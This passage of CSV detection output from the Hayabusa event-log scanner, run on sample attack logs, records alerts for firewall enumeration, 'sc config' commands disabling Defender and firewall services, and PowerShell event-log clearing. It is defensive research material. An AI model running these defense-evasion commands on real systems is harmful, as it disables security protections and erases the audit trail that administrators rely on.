0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['KeyEncoding'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing]($this.PSBase.CimInstanceProperties['EnablePacketQueuing'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['EnablePacketQueuing'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:13.848 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-NetFirewallSetting): 
""Get-NetFirewallSetting"" ParameterBinding(Get-NetFirewallSetting): name=""All""; value=""False"" ParameterBinding(Get-NetFirewallSetting): name=""PolicyStore""; value="""" ParameterBinding(Get-NetFirewallSetting): name=""GPOSession""; value="""" ParameterBinding(Get-NetFirewallSetting): name=""CimSession""; value="""" ParameterBinding(Get-NetFirewallSetting): name=""ThrottleLimit""; value=""0"" ParameterBinding(Get-NetFirewallSetting): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:13.848 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""MSFT_NetSecuritySettingData (InstanceID = ""MSFT?GlobalIPSecSettingData"")""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:13.864 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:57:04.361 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc config sense start= disabled | Path: C:\Windows\System32\sc.exe | PID: 0xe58 | User: admmig | LID: 
0x1844fa6,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender service deactivation attempt.evtx +2021-10-25 16:57:05.977 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc config mpssvc start= disabled | Path: C:\Windows\System32\sc.exe | PID: 0x2ebc | User: admmig | LID: 0x1844fa6,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender service deactivation attempt.evtx +2021-10-25 16:57:08.463 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc config WinDefend start= disabled | Path: C:\Windows\System32\sc.exe | PID: 0x2e40 | User: admmig | LID: 0x1844fa6,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender service deactivation attempt.evtx +2021-10-26 03:04:24.089 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"Clear-EventLog -LogName application, system -confirm",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID800-4103-4104-Clear event log attempt.evtx +2021-10-26 03:04:30.334 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:04:30.334 
+09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Clear-EventLog): ""Clear-EventLog"" ParameterBinding(Clear-EventLog): name=""LogName""; value=""application, system"" ParameterBinding(Clear-EventLog): name=""Confirm""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID800-4103-4104-Clear event log attempt.evtx +2021-10-26 03:04:30.334 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID800-4103-4104-Clear event log attempt.evtx +2021-10-26 03:04:30.350 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID800-4103-4104-Clear event log attempt.evtx +2021-10-26 03:09:51.875 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.002 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.080 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: 
admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.095 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.127 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.142 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.215 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.293 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.340 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: 
admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.355 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.418 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.480 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.527 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.574 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.591 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: 
admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.606 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.638 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.653 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.669 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.747 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.778 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: 
admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.794 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.841 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.856 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.888 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.903 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.950 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: 
admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.997 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.028 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.044 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.059 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.075 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.106 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: 
admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.138 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.184 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.200 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.216 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.231 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.263 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: 
admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.294 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.309 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.325 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.341 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.356 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.403 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: 
admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.419 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.434 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.450 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.497 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: 
admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.528 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.747 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.763 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.778 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.794 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.809 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: 
admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.856 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.934 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.997 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.028 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.091 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.106 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: 
admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.184 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.200 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.216 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.247 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: 